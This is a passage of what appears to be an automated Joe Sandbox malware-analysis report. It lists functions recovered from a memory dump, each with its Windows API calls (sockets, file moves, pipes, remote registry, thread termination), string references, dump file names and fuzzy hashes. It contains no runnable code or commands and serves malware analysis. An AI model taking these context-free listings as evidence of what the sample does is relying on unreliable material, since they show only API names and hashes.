socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A71112
WSAGetLastError.WSOCK32 ref: 00A71121
WSAGetLastError.WSOCK32 ref: 00A711C9
closesocket.WSOCK32(00000000), ref: 00A711F9

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: af0cabb1e9b911147d504cc80761a31e1ec08047ac753b8e782f2c0fa7ceaa6e
Instruction ID: d1a002de673ab660703b3111ef05a07845603c3ae9a4f1b4b5b3a013997d74c1
Opcode Fuzzy Hash: af0cabb1e9b911147d504cc80761a31e1ec08047ac753b8e782f2c0fa7ceaa6e
Instruction Fuzzy Hash: 1641C331600208AFDB10DF58CC85BA9B7E9EF85324F54C159FA199F291D770AD42CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A5CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A5CF22,?), ref: 00A5DDFD

Part of subcall function 00A5DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A5CF22,?), ref: 00A5DE16

lstrcmpiW.KERNEL32(?,?), ref: 00A5CF45
MoveFileW.KERNEL32 ref: 00A5CF7F
_wcslen.LIBCMT ref: 00A5D005
_wcslen.LIBCMT ref: 00A5D01B
SHFileOperationW.SHELL32(?), ref: 00A5D061

Strings

\*.*, xrefs: 00A5CFF3

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 74194309192a96dd38236a2957c89594ff124d35639b9d7d4f79e81cae1e170b
Instruction ID: 9bf37e021a46d824ef53f405723c36a2ad535509e605a0a90b8445d42353ed5f
Opcode Fuzzy Hash: 74194309192a96dd38236a2957c89594ff124d35639b9d7d4f79e81cae1e170b
Instruction Fuzzy Hash: EE4155719053185FDF12EBA4DE81ADEB7B8BF08391F0000E6E505EB142EA34AB8DCB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A82DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A82E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00A82E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00A82E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A82EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A82EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00A82EF1
SetWindowLongW.USER32 ref: 00A82F0B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: bc2decc993d4b963307fd9d37028448f446111ba56a3e75812f145a3fa07dd1e
Instruction ID: 1e7b0473dc228ad79aa87e369bdf0c98d95eab03dcb6f2ca335f6acb58fa82a5
Opcode Fuzzy Hash: bc2decc993d4b963307fd9d37028448f446111ba56a3e75812f145a3fa07dd1e
Instruction Fuzzy Hash: CA310130644250AFEB21EF98DC84FA53BE1FB9A720F1501A5FA018F2B2CB75AC41DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00A57726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A57769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A5778F
SysAllocString.OLEAUT32(00000000), ref: 00A57792
SysAllocString.OLEAUT32(?), ref: 00A577B0
SysFreeString.OLEAUT32(?), ref: 00A577B9
StringFromGUID2.OLE32(?,?,00000028), ref: 00A577DE
SysAllocString.OLEAUT32(?), ref: 00A577EC

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: b7ccf4ca19b26a1012b5cb9a0122367221b071fbd1c351643c0c49e7819fa2a5
Instruction ID: 9bc37c947a97178ce75ddf7706502879c856d6b041c3a56a99019d8753f6a34d
Opcode Fuzzy Hash: b7ccf4ca19b26a1012b5cb9a0122367221b071fbd1c351643c0c49e7819fa2a5
Instruction Fuzzy Hash: 17218176604219AFDB10DFA8EC88CBF77ACFB09764B048025BD15EB191D670DD46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A577FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A57842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A57868
SysAllocString.OLEAUT32(00000000), ref: 00A5786B
SysAllocString.OLEAUT32 ref: 00A5788C
SysFreeString.OLEAUT32 ref: 00A57895
StringFromGUID2.OLE32(?,?,00000028), ref: 00A578AF
SysAllocString.OLEAUT32(?), ref: 00A578BD

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 3922e4178b41ef2e72e50dac387480ecfdf9fa7f603fba7b7b8619e04b8eb30d
Instruction ID: ca05137b8f151c9e59b2bb1ca636b49342d8b482289f288ddbf8a8d063712a98
Opcode Fuzzy Hash: 3922e4178b41ef2e72e50dac387480ecfdf9fa7f603fba7b7b8619e04b8eb30d
Instruction Fuzzy Hash: D5215E32608214AFDB10DBE9EC8CDAA77ACFB097617108125B915DB2A1D674DC85CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00A604D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00A604F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A6052E

Strings

nul, xrefs: 00A60567

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 10f08911383f4e0690751a27048793b3512d2285a2513ee62608e4e5bfd562a7
Instruction ID: 0e726c0754f050d0d6debb8cf81981e3e66e872b5e61482f70a2810aa96685b5
Opcode Fuzzy Hash: 10f08911383f4e0690751a27048793b3512d2285a2513ee62608e4e5bfd562a7
Instruction Fuzzy Hash: AB216B75500305ABDB209F69DC44E9B7BB4AF54724F208A19F8A2E62E0E7709981CF20

Uniqueness

Uniqueness Score: -1.00%

Function 00A605A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00A605C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A60601

Strings

nul, xrefs: 00A60639

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 00b5eb3fa966be2c4431aa5c4516c7f760327a87c4eb24402b15a6b8d4128d90
Instruction ID: c18a69165651e51098891dcdf0ab335d19a69b280a07881f0a5c03c1230419f3
Opcode Fuzzy Hash: 00b5eb3fa966be2c4431aa5c4516c7f760327a87c4eb24402b15a6b8d4128d90
Instruction Fuzzy Hash: 2E2153795003059BDB209F69DC44E9B7BF4BF95730F204A19F8A1E72E0E7B099A1CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A840AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F600E: CreateWindowExW.USER32 ref: 009F604C
Part of subcall function 009F600E: GetStockObject.GDI32(00000011), ref: 009F6060
Part of subcall function 009F600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 009F606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A84112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A8411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A8412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A84139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A84145

Strings

Msctls_Progress32, xrefs: 00A840E3

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: cdf30967be2ed94453117e01277d716c39fad54061e9fa67c5901be12f60fc96
Instruction ID: 69571faacecd7fdd2e5250949ce75e8d079931723abfeaaa519068264ec84ddb
Opcode Fuzzy Hash: cdf30967be2ed94453117e01277d716c39fad54061e9fa67c5901be12f60fc96
Instruction Fuzzy Hash: BA1190B215021ABEEF119FA4CC85EE77F6DEF08798F014110BA18A2090CB769C219BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A2D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A2D7A3: _free.LIBCMT ref: 00A2D7CC

_free.LIBCMT ref: 00A2D82D

Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0

_free.LIBCMT ref: 00A2D838
_free.LIBCMT ref: 00A2D843
_free.LIBCMT ref: 00A2D897
_free.LIBCMT ref: 00A2D8A2
_free.LIBCMT ref: 00A2D8AD
_free.LIBCMT ref: 00A2D8B8

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: b18e6dc8b7d7081ab7bad06bae262fd5ec21d445e3154c9ebd8dd38cc409ab27
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 25115E71540B24BAD625BFB8EE47FCB7BDCAF44700F800835B2D9AA093DA69B5458760

Uniqueness

Uniqueness Score: -1.00%

Function 00A5DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A5DA74
LoadStringW.USER32(00000000), ref: 00A5DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A5DA91
LoadStringW.USER32(00000000), ref: 00A5DA98
MessageBoxW.USER32 ref: 00A5DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00A5DAB9

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: ac2dfb15796b893b2d6c60ae84a458eb57c3392aad0975c635e2deb78ef19c7b
Instruction ID: 6d9efcfad8ca70109fedf49836aefa3c3caa33d1c7eb39894086837c6c994944
Opcode Fuzzy Hash: ac2dfb15796b893b2d6c60ae84a458eb57c3392aad0975c635e2deb78ef19c7b
Instruction Fuzzy Hash: 5B0186F29002087FE710EBE09D89EE7376CF708311F4005A2B746E6042E6749E854F74

Uniqueness

Uniqueness Score: -1.00%

Function 00A6096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00B8A3F0,00B8A3F0), ref: 00A6097B
EnterCriticalSection.KERNEL32(00B8A3D0,00000000), ref: 00A6098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 00A6099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A609A9
CloseHandle.KERNEL32(00000000), ref: 00A609B8
InterlockedExchange.KERNEL32(00B8A3F0,000001F6), ref: 00A609C8
LeaveCriticalSection.KERNEL32(00B8A3D0), ref: 00A609CF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: f44eeb31df079a308d9c37150fd0ba14b542e487c629debdd768cc22d9573acb
Instruction ID: d6e78666116317d93b3b66838cb82374a80336ebe19417bebccca1dbca8f69b7
Opcode Fuzzy Hash: f44eeb31df079a308d9c37150fd0ba14b542e487c629debdd768cc22d9573acb
Instruction Fuzzy Hash: 6BF01932442A12ABD741ABE4EE8CED6BB39FF01722F402025F202908A0D7749466CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A201B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00A200BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A200D6
__allrem.LIBCMT ref: 00A200ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A2010B
__allrem.LIBCMT ref: 00A20122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A20140

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 2fdb22f03d6386166443ecb7cb98c6a8a310e6b0086964a23c36658445668b59
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 42811572A00726AFE7249F2CDD41FAB73E9AF41364F24423AF551D7682E7B0D9418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A7BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

Part of subcall function 00A7C998: CharUpperBuffW.USER32(?,?), ref: 00A7C9B5
Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7C9F1
Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA68
Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7BCCA
RegOpenKeyExW.ADVAPI32 ref: 00A7BD25
RegCloseKey.ADVAPI32(00000000), ref: 00A7BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A7BD99
RegCloseKey.ADVAPI32(?), ref: 00A7BDF3
RegCloseKey.ADVAPI32(?), ref: 00A7BDFF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 841f1e89b3cc34a63364ebee36b080e92aeafc3b30484917845fe090135725ff
Instruction ID: 40fe4e6aab77d8fced9d3546ec3d308ce4ad177fb1fce164c504cc1aa65c7ee1
Opcode Fuzzy Hash: 841f1e89b3cc34a63364ebee36b080e92aeafc3b30484917845fe090135725ff
Instruction Fuzzy Hash: B0817B70218241AFD714DF24C881F2ABBE5BF84348F14C96CF5598B2A2DB31ED45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A4F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00A4F7B9
SysAllocString.OLEAUT32(00000001), ref: 00A4F860
VariantCopy.OLEAUT32(00A4FA64,00000000), ref: 00A4F889
VariantClear.OLEAUT32(00A4FA64), ref: 00A4F8AD
VariantCopy.OLEAUT32(00A4FA64,00000000), ref: 00A4F8B1
VariantClear.OLEAUT32(?), ref: 00A4F8BB

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 0c4d790d78510505e2d8d490e7dfeed76f67dd749a7011a0b4982e6162396f0a
Instruction ID: 39bb7abb908ffdf3a1c212523fd22ae6cf327836e0a432c7927b0c8638f9af60
Opcode Fuzzy Hash: 0c4d790d78510505e2d8d490e7dfeed76f67dd749a7011a0b4982e6162396f0a
Instruction Fuzzy Hash: E351B839A00314BEDF24AF65D895B39B3A4EFC5310F24A467E905DF292DBB08C40CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00A6910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 009F7620: _wcslen.LIBCMT ref: 009F7625

Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 00A694E5
_wcslen.LIBCMT ref: 00A69506
_wcslen.LIBCMT ref: 00A6952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00A69585

Strings

X, xrefs: 00A69412

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: b2e4a70b0f55985d9eaad9a73003f6347af01fc2a732d0952d948a9025bf14dc
Instruction ID: 731243f3aa1641b61de335e4f0da833c1cc81f7ecf82d8edcb262f0188d52a5f
Opcode Fuzzy Hash: b2e4a70b0f55985d9eaad9a73003f6347af01fc2a732d0952d948a9025bf14dc
Instruction Fuzzy Hash: C7E17A716083409FD724EF24C881B6AB7F4BF85314F04896DF9999B2A2DB31ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A0920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2

BeginPaint.USER32(?,?), ref: 00A09241
GetWindowRect.USER32(?,?), ref: 00A092A5
ScreenToClient.USER32(?,?), ref: 00A092C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A092D3
EndPaint.USER32(?,?), ref: 00A09321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A471EA

Part of subcall function 00A09339: BeginPath.GDI32(00000000), ref: 00A09357

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
